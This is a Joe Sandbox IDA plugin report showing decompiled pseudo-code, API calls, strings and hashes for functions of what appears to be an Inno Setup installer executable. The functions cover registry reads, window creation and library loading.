Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: 5cc6e3da124f8aadfdc082a16de78a8018f487bf838407efb0f4b0e3b3118a0c
Instruction ID: b1d3936b68a7f15f8cbb91b6e5f37db014e452a99e8ace7c5cdc1966dd3dd048
Opcode Fuzzy Hash: 5cc6e3da124f8aadfdc082a16de78a8018f487bf838407efb0f4b0e3b3118a0c
Instruction Fuzzy Hash: 47615434A002588BDB25DF25C881AD9B7B5EF49305F0084EAED8D9B352DB74AEC9CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00402088 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,004021FC), ref: 004020CB

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

p+w, xrefs: 004020F8, 00402122, 0040213C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID: p+w
API String ID: 296031713-329361588
Opcode ID: ee3ab2e0cf350ab74073486b750bea8e9b108be62e5d61e54ac9983a482f1b24
Instruction ID: 43da59c6024c014fdcfbd4f667e22ace29d18c19eb36fc191a59cc880b6cb292
Opcode Fuzzy Hash: ee3ab2e0cf350ab74073486b750bea8e9b108be62e5d61e54ac9983a482f1b24
Instruction Fuzzy Hash: C941F4B2E003409FDB10CF68DD8921A77A4F7A8328F15417BD844A77E1D3B89851CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00496EA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 75%

			_entry_(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				intOrPtr _t34;
				intOrPtr _t38;
				intOrPtr _t40;
				intOrPtr _t43;
				intOrPtr _t48;
				intOrPtr _t54;
				intOrPtr _t61;
				void* _t64;
				void* _t65;
				void* _t72;
				void* _t75;
				intOrPtr _t76;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				void* _t83;
				void* _t84;
				intOrPtr _t86;

				_t87 = __eflags;
				_t75 = __edx;
				_t65 = __ecx;
				E00403344();
				E004056A0(_t64, _t83, _t84, __eflags);
				E00406334(); // executed
				_t9 = E0040992C(_t64, _t65, _t75, _t83, _t84, _t87); // executed
				E00409B60(_t9);
				E0041093C();
				E004109B4();
				E00412910(_t64, _t83, _t84, _t87);
				E00424F28(E00419028(_t83));
				E0042F360();
				E0043064C(_t65);
				E0044ED7C();
				E0044F160();
				E00450B58(_t64, _t83, _t84); // executed
				E00452550(_t64, _t65, _t83, _t84); // executed
				E00455EF8(_t64, _t83, _t84, _t87);
				E00456E00(_t64, _t75, _t83, _t84);
				E0045866C(_t64, _t83, _t84);
				E00463998();
				E0046BAA4();
				E00477340(); // executed
				E00481EBC(_t64, _t83, _t84, _t87); // executed
				E00493E48();
				_push(0x496f63);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				SetErrorMode(1); // executed
				E00496C64();
				_t34 =  *0x49a628; // 0x2262410
				E004244BC(_t34, _t83, _t84, E00496BF0, 0x496be4);
				E00496CAC(_t64, _t83, _t84, _t87);
				_pop(_t76);
				 *[fs:eax] = _t76;
				_t38 =  *0x49a628; // 0x2262410
				E004242AC(_t38, 0x4970dc, _t83);
				_t40 =  *0x49a628; // 0x2262410
				ShowWindow( *(_t40 + 0x20), 5);
				_t43 =  *0x49a628; // 0x2262410
				 *((intOrPtr*)(_t43 + 0x90)) = 0x4773dc;
				 *((intOrPtr*)(_t43 + 0x8c)) = E004805D0;
				_push(_t85);
				_push(0x496ffa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E00424590(); // executed
				E0047E138(_t64, _t83, _t84, _t87); // executed
				_t48 =  *0x49a628; // 0x2262410, executed
				E004245A0(_t48, 0x49b088, 0x4773dc);
				E00480744(_t87, __fp0); // executed
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(_t85);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				_t54 =  *0x49a628; // 0x2262410
				E00424630(_t54, _t83, _t84);
				_pop(_t81);
				_t72 = 0x497078;
				 *[fs:eax] = _t81;
				_push(_t85);
				_push(0x4970ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E0047F9E4(0 |  *0x49b3b0 == 0x00000000, _t64, _t72, _t83, _t84,  *0x49b3b0, __fp0);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_t61 =  *0x49b3b0; // 0x0
				E00404E58(_t61);
				return E00404E54();
			}

0x00496ea4
0x00496ea4
0x00496ea4
0x00496ead
0x00496eb2
0x00496eb7
0x00496ebc
0x00496ec1
0x00496ec6
0x00496ecb
0x00496ed0
0x00496eda
0x00496edf
0x00496ee4
0x00496ee9
0x00496eee
0x00496ef3
0x00496ef8
0x00496efd
0x00496f02
0x00496f07
0x00496f0c
0x00496f11
0x00496f16
0x00496f1b
0x00496f20
0x00496f28
0x00496f2d
0x00496f30
0x00496f35
0x00496f3a
0x00496f4a
0x00496f4f
0x00496f54
0x00496f5b
0x00496f5e
0x00496f81
0x00496f86
0x00496f8d
0x00496f96
0x00496f9b
0x00496fa5
0x00496fab
0x00496fb7
0x00496fb8
0x00496fbd
0x00496fc0
0x00496fc8
0x00496fcd
0x00496fdc
0x00496fe1
0x00496feb
0x00496ff2
0x00496ff5
0x00497058
0x0049705e
0x00497061
0x00497064
0x00497069
0x00497070
0x00497072
0x00497073
0x00497089
0x0049708a
0x0049708f
0x00497092
0x0049709f
0x004970a6
0x004970a9
0x004970bd
0x004970c2
0x004970d2

APIs

Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00496EB2), ref: 0040334B
Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00496EB2), ref: 00403356

Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00496EBC), ref: 0040633A
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D

Part of subcall function 00409B60: 6F50DB20.COMCTL32(00496EC6), ref: 00409B60

Part of subcall function 0041093C: GetCurrentThreadId.KERNEL32 ref: 0041098A

Part of subcall function 00419028: GetVersion.KERNEL32(00496EDA), ref: 00419028

Part of subcall function 0044ED7C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00496EEE), ref: 0044EDB7
Part of subcall function 0044ED7C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EDBD

Part of subcall function 0044F160: GetVersionExA.KERNEL32(0049A788,00496EF3), ref: 0044F16F

Part of subcall function 00452550: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004525E9,?,?,?,?,00000000,?,00496EFD), ref: 00452570
Part of subcall function 00452550: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452576
Part of subcall function 00452550: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004525E9,?,?,?,?,00000000,?,00496EFD), ref: 0045258A
Part of subcall function 00452550: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452590

Part of subcall function 00455EF8: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00455F1C

Part of subcall function 00463998: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00496F11), ref: 004639A7
Part of subcall function 00463998: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 004639AD

Part of subcall function 0046BAA4: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BAB9

Part of subcall function 00477340: GetModuleHandleA.KERNEL32(kernel32.dll,?,00496F1B), ref: 00477346
Part of subcall function 00477340: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00477353
Part of subcall function 00477340: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00477363

Part of subcall function 00493E48: RegisterClipboardFormatA.USER32 ref: 00493E61

SetErrorMode.KERNEL32(00000001,00000000,00496F63), ref: 00496F35

Part of subcall function 00496C64: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00496F3F,00000001,00000000,00496F63), ref: 00496C6E
Part of subcall function 00496C64: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496C74

Part of subcall function 004244BC: SendMessageA.USER32 ref: 004244DB

Part of subcall function 004242AC: SetWindowTextA.USER32(?,00000000), ref: 004242C4

ShowWindow.USER32(?,00000005,00000000,00496F63), ref: 00496F96

Part of subcall function 00480744: SetActiveWindow.USER32(?), ref: 004807F2

Strings

Setup, xrefs: 00496F7C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModeRegisterSendShowTextThread
String ID: Setup
API String ID: 4266685988-3839654196
Opcode ID: 900fd1c84efe23903bec7581b943f2a9bdc3ba25327b8f7de090c37ff2e419f3
Instruction ID: 6d0fc44b7975fa4b91f5bbb953351e2f3151c2457cc47be2ae498005ac358bba
Opcode Fuzzy Hash: 900fd1c84efe23903bec7581b943f2a9bdc3ba25327b8f7de090c37ff2e419f3
Instruction Fuzzy Hash: 4C31F5712186449ED601BBB7EC1391D3B94EB8971CB52447FF80486593DE3D58118ABE

Uniqueness

Uniqueness Score: -1.00%

Function 0047AC84 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047AC84() {
				void* _v8;
				void* __ecx;
				void* _t11;
				long _t17;
				void* _t18;

				if( *0x49b370 == 0) {
					_t18 = 0;
				} else {
					_t18 = 2;
				}
				_t11 = E0042DD1C(_t18,  *0x00498CE8, 0x80000002,  &_v8, 1, 0); // executed
				if(_t11 == 0) {
					E0042DC4C();
					E0042DC4C();
					_t17 = RegCloseKey(_v8); // executed
					return _t17;
				}
				return _t11;
			}

0x0047ac90
0x0047ac96
0x0047ac92
0x0047ac92
0x0047ac92
0x0047acb5
0x0047acbc
0x0047accb
0x0047acdd
0x0047ace6
0x00000000
0x0047ace6
0x0047acee

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047AF0A,00000000,0047AF20,?,?,?,?,00000000), ref: 0047ACE6

Strings

RegisteredOrganization, xrefs: 0047ACD5
RegisteredOwner, xrefs: 0047ACC3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: 5b1624e0d0a26370ad87dfaa62c64d4df9973d747b83543c7d8c6e65497b8bc9
Instruction ID: b9eacae86494219c9247879311a17811a387abae95f33f841a50e1cc0b921638
Opcode Fuzzy Hash: 5b1624e0d0a26370ad87dfaa62c64d4df9973d747b83543c7d8c6e65497b8bc9
Instruction Fuzzy Hash: ECF09071704244BFDB05DA65FE92B9F339AE781304F20803BE5059B292D7789E01975D

Uniqueness

Uniqueness Score: -1.00%

Function 0046DAE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046DAE4(void* __eax, void* __ecx, char* __edx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				long _t11;
				void* _t22;

				_t16 = __ecx;
				_t21 = __edx;
				_t22 = __eax;
				_t7 = E00403574(__ecx);
				_t11 = RegSetValueExA(_t22, __edx, 0, 1, E00403738(__ecx), _t7 + 1); // executed
				if(_t11 != 0) {
					_t2 = _a4 - 8; // 0x0
					_t4 = _a4 - 4; // 0x0
					return E0046D9C8(0, _t16,  *_t2,  *_t4, _t21, _t22, 0, _t11);
				}
				return _t11;
			}

0x0046daea
0x0046daec
0x0046daee
0x0046daf2
0x0046db07
0x0046db0e
0x0046db14
0x0046db1a
0x00000000
0x0046db1f
0x0046db28

APIs

RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,CLG,0049B16C,?,0046DDFB,?,00000000,0046E352,?,_is1), ref: 0046DB07

Strings

Inno Setup: Setup Version, xrefs: 0046DB05
CLG, xrefs: 0046DAE8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value
String ID: CLG$Inno Setup: Setup Version
API String ID: 3702945584-2051458772
Opcode ID: 46f913c97ef30ec655d0d3bd7153d7264a5ad830b42208ddf98e38fec9dc857b
Instruction ID: 63f1866591e0cfe6b0df424f345f824daa48978019e59ff859285ae1a5716b57
Opcode Fuzzy Hash: 46f913c97ef30ec655d0d3bd7153d7264a5ad830b42208ddf98e38fec9dc857b
Instruction Fuzzy Hash: 6BE06DB17012043FD710AA2A9C85F6BBADCDF98765F10403AB908DB392D578DD0081A8

Uniqueness

Uniqueness Score: -1.00%

Function 00473E44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00473E44(void* __edx, intOrPtr _a4) {
				void* _t11;
				intOrPtr _t14;
				void* _t17;

				_t11 = CreateFileA(E00403738( *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) - 0x1c))), 0xc0000000, 0, 0, 1, 0x80, 0); // executed
				_t17 = _t11;
				if(_t17 == 0xffffffff) {
					E004527FC("CreateFile");
				}
				CloseHandle(_t17);
				_t14 =  *((intOrPtr*)(_a4 + 8));
				 *((char*)(_t14 - 0x21)) = 1;
				return _t14;
			}

0x00473e69
0x00473e6e
0x00473e73
0x00473e7a
0x00473e7a
0x00473e80
0x00473e88
0x00473e8b
0x00473e91

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047407B), ref: 00473E69
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047407B), ref: 00473E80

Part of subcall function 004527FC: GetLastError.KERNEL32(00000000,0045326D,00000005,00000000,004532A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,004966A1,00000000), ref: 004527FF

Strings

CreateFile, xrefs: 00473E75

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: 6e1e6dd59de84e1610d1fae5968a7dc4b8fcfba8eb0a6e29607e31f7e7f0bfbb
Instruction ID: 4841faf599e7bc621e79a9eb559aeb390f00cccbb334f8fc222e39aaa6a1ffd8
Opcode Fuzzy Hash: 6e1e6dd59de84e1610d1fae5968a7dc4b8fcfba8eb0a6e29607e31f7e7f0bfbb
Instruction Fuzzy Hash: 74E065342403447BDA10FA65CCC6F4977889B14728F108156F9446F3E2C5B5EC408618

Uniqueness

Uniqueness Score: -1.00%

Function 00406300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406300(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00406329
0x00406330

APIs

CreateWindowExA.USER32 ref: 00406329

Strings

d6B, xrefs: 0040630C, 0040630F
TApplication, xrefs: 00406326

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateWindow
String ID: TApplication$d6B
API String ID: 716092398-1016400865
Opcode ID: 9fe79a92e10620011824defd5e810c08c8dc52875c3fb3ec0cb06ffc5b1ed454
Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
Opcode Fuzzy Hash: 9fe79a92e10620011824defd5e810c08c8dc52875c3fb3ec0cb06ffc5b1ed454
Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00455EF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00455EF8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				void* _t11;

				E00455E88(E00404A2C(0x498abc), __edi, __esi, _t11, __eflags);
				_t5 = E0042E294("shell32.dll", __ebx, 0x8000); // executed
				_t6 = GetProcAddress(_t5, "SHCreateItemFromParsingName");
				 *0x49afa8 = _t6;
				return _t6;
			}

0x00455f02
0x00455f16
0x00455f1c
0x00455f21
0x00455f26

APIs

Part of subcall function 00455E88: CoInitialize.OLE32(00000000), ref: 00455E8E

Part of subcall function 0042E294: SetErrorMode.KERNEL32(00008000), ref: 0042E29E
Part of subcall function 0042E294: LoadLibraryA.KERNEL32(00000000,00000000,0042E2E8,?,00000000,0042E306,?,00008000), ref: 0042E2CD

GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00455F1C

Strings

shell32.dll, xrefs: 00455F11
SHCreateItemFromParsingName, xrefs: 00455F07

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressErrorInitializeLibraryLoadModeProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2906209438-2320870614
Opcode ID: 378ff3c3cad201b1a507828d88c32ecd3d9794aa842a99f409d8679426ba3c20
Instruction ID: 086cb54cd4a6b743611040c34fa54cac9677e4986cde9c94649046165b75af72
Opcode Fuzzy Hash: 378ff3c3cad201b1a507828d88c32ecd3d9794aa842a99f409d8679426ba3c20
Instruction Fuzzy Hash: 7DC04CE1740B109ACA0077FA786362F25049B9171FB60947FB944BA5C7DE7C84485B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0046BAA4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046BAA4() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				void* _t4;

				_t2 = E0042E294("shell32.dll", _t4, 0x8000); // executed
				_t3 = GetProcAddress(_t2, "SHPathPrepareForWriteA");
				 *0x49b054 = _t3;
				return _t3;
			}

0x0046bab3
0x0046bab9
0x0046babe
0x0046bac3

APIs

Part of subcall function 0042E294: SetErrorMode.KERNEL32(00008000), ref: 0042E29E
Part of subcall function 0042E294: LoadLibraryA.KERNEL32(00000000,00000000,0042E2E8,?,00000000,0042E306,?,00008000), ref: 0042E2CD

GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BAB9

Strings

shell32.dll, xrefs: 0046BAAE
SHPathPrepareForWriteA, xrefs: 0046BAA4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressErrorLibraryLoadModeProc
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2492108670-2683653824
Opcode ID: 948b90149d54e18bd261352400ddc51825f4a6410e897a91b91800c131cd32d8
Instruction ID: 7c64519ac477b0256fe014147c0aca13071f4397c6298e198afe032025d1c874
Opcode Fuzzy Hash: 948b90149d54e18bd261352400ddc51825f4a6410e897a91b91800c131cd32d8
Instruction Fuzzy Hash: 9BB092D060178086CE00A7F3694260B2608DB80708B24C47B7144EA689EF7C84499BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0047FDF8 Relevance: 4.6, APIs: 3, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0047FDF8(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v24;
				char _v28;
				void* _t21;
				signed int _t26;
				intOrPtr _t27;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr _t41;
				char _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				struct HMENU__* _t77;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t76 = __esi;
				_t75 = __edi;
				_t64 = __edx;
				_t79 = _t80;
				_t81 = _t80 + 0xffffffe8;
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_t82 = __edx;
				if(__edx != 0) {
					_t81 = _t81 + 0xfffffff0;
					_t21 = E00402D30(_t21, _t79);
				}
				_v5 = _t64;
				_t59 = _t21;
				_push(_t79);
				_push(0x47ff30);
				_push( *[fs:eax]);
				 *[fs:eax] = _t81;
				E00493A10(0); // executed
				_t26 = E00493D18(_t21, _t82);
				if(( *0x49b29a & 0x00000020) == 0) {
					_t27 =  *0x49a628; // 0x2262410
					 *((char*)(_t27 + 0x3a)) = 0;
				} else {
					if(( *0x49b29a & 0x00000040) != 0) {
						__eflags =  *0x49b29a & 0x00000080;
						if(( *0x49b29a & 0x00000080) == 0) {
							_t26 = E00420FAC(_t59, 1);
						}
					} else {
						_t26 = E00420FAC(_t59, 0);
					}
					E00493588(_t26 & 0xffffff00 |  *((char*)(_t59 + 0x111)) == 0x00000002,  &_v24);
					E00414664(_t59,  &_v24);
					E004181A4(_t59);
					if(( *0x49b29b & 0x00000001) != 0) {
						E0042153C(_t59, 2);
					}
				}
				_t66 =  *0x49b39c; // 0x2278c20
				E004507B8(0x99,  &_v28, _t66);
				E00414B00(_t59, _t59, _v28, _t75, _t76);
				_t77 = GetSystemMenu(E004181C8(_t59), 0);
				AppendMenuA(_t77, 0x800, 0, 0);
				_t36 =  *0x49ac28; // 0x227c480
				AppendMenuA(_t77, 0, 0x270f, E00403738(_t36));
				_t39 =  *0x49a628; // 0x2262410
				E004244BC(_t39, _t75, _t77, 0x481914, _t59);
				_t41 =  *0x49a628; // 0x2262410
				if( *((char*)(_t41 + 0x3a)) != 0) {
					E00420BA8(_t59, 1);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(0x47ff37);
				return E00403400( &_v28);
			}

0x0047fdf8
0x0047fdf8
0x0047fdf8
0x0047fdf9
0x0047fdfb
0x0047fdff
0x0047fe00
0x0047fe03
0x0047fe06
0x0047fe08
0x0047fe0a
0x0047fe0d
0x0047fe0d
0x0047fe12
0x0047fe15
0x0047fe19
0x0047fe1a
0x0047fe1f
0x0047fe22
0x0047fe29
0x0047fe30
0x0047fe3c
0x0047fe9b
0x0047fea0
0x0047fe3e
0x0047fe45
0x0047fe52
0x0047fe59
0x0047fe5f
0x0047fe5f
0x0047fe47
0x0047fe4b
0x0047fe4b
0x0047fe71
0x0047fe7b
0x0047fe82
0x0047fe8e
0x0047fe94
0x0047fe94
0x0047fe8e
0x0047fea7
0x0047feaf
0x0047feb9
0x0047fecd
0x0047fed9
0x0047fede
0x0047fef1
0x0047fefc
0x0047ff01
0x0047ff06
0x0047ff0f
0x0047ff15
0x0047ff15
0x0047ff1c
0x0047ff1f
0x0047ff22
0x0047ff2f

APIs

GetSystemMenu.USER32(00000000,00000000,00000000,0047FF30), ref: 0047FEC8
AppendMenuA.USER32 ref: 0047FED9
AppendMenuA.USER32 ref: 0047FEF1

Memory Dump Source

